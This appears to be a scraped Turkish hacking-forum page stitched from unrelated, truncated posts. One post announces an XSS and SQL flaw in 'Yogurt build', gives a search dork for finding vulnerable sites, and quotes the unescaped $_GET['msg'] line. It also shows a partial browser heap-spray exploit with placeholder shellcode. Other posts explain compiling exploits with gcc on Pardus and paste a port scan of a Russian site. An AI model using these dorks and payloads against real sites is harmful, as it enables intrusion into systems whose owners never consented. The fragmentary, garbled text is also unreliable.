Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz.. Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.
bu açığa yoğurt açığı ismini verdimm.....
2009-06-11 tarhinde bulunmuştur...Dorkumuz : "Yogurt build" ve 2 tane açık XSS ve SQL
XSS açığı
index.php içinde...
index.php:45: if(isset($_GET['msg']))
index.php:48: print("<center>". $_GET['msg'] . "</center>"); <--
ise XSS...
<html>
<body>
<script language="JavaScript">
var shellcode = unescape("evil code");
var array = new Array();
var ls = 0x81000-(shellcode.length*2);
var bigblock = unescape("%u0b0c%u0b0C");
while(bigblock.length<ls/2)
{bigblock+=bigblock;}
var lh = bigblock.substring(0,ls/2);
delete bigblock...
arkadaşlar arnızda pardus kullnıpta derleme yapamıyorum diyen varsa şu yolları izlesinn...
1.paket yöneticisine gelin ve gcc programını arayın ve kurun...
2.f4 ile konsolu açınn
3.cd.. komtu ile kök dizine çıkın..ve geleceğiniz klasöre(exploitin bulunduğu yer) cd komutu ile gelin
4.gcc...
..
2 tane yardımm..
1.pardus kullanıyorum (linux dağıtımı ) gcc compiler var ama bazı exploitlerde hata veriyor şu dosya eksik..acaba pardusten midir..yoksa library hatasımı windowstaki gibi..??
2. si bi port tarama yaptım bi rus siteye
1/tcp open tcpwrapped
4/tcp open...